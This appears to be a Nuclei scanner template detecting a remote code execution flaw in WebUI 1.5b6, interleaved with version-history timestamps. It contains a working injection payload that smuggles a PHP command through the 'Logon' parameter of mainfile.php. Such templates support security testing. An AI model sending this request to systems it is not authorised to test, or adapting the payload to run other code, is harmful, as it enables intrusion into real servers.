2021-02-19 08:21:21 +00:00
id : webui-rce
2022-04-22 10:38:41 +00:00
2021-02-19 07:39:32 +00:00
info :
2022-06-03 19:12:31 +00:00
name : WebUI 1.5b6 - Remote Code Execution
2021-02-19 07:39:32 +00:00
author : pikpikcu
severity : critical
2022-06-03 19:12:31 +00:00
description : WebUI 1.5b6 is vulnerable to remote code execution because the 'mainfile.php' endpoint allows remote attackersto execute arbitrary code via the 'Logon' parameter.
2022-04-22 10:38:41 +00:00
reference :
- https://www.exploit-db.com/exploits/36821
2022-06-03 19:12:31 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
2023-10-14 11:27:55 +00:00
cvss-score : 10
2022-06-03 19:12:31 +00:00
cwe-id : CWE-77
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-10-14 11:27:55 +00:00
tags : webui,rce,edb
2021-02-19 08:21:21 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-02-19 07:39:32 +00:00
- method : GET
path :
2021-02-19 08:21:21 +00:00
- '{{BaseURL}}/mainfile.php?username=test&password=testpoc&_login=1&Logon=%27%3Becho%20md5(TestPoc)%3B%27'
2021-02-19 07:39:32 +00:00
matchers-condition : and
matchers :
- type : word
words :
2021-02-19 08:21:21 +00:00
- "c5b3d7397a90f42d222f7ed9408c0dc6"
2021-02-19 07:39:32 +00:00
part : body
- type : status
status :
2022-06-03 19:12:31 +00:00
- 200
2023-10-20 11:41:13 +00:00
# digest: 4b0a00483046022100b14b49f95f50a9f32431c4491034a1b6d26c07aeab06537327c5e8451167d49f022100dd9a4785307420a24fb449ed847f552f61cb46a75a7f1560be1bea277fbbcbda:922c64590222798bb761d5b6d8e72950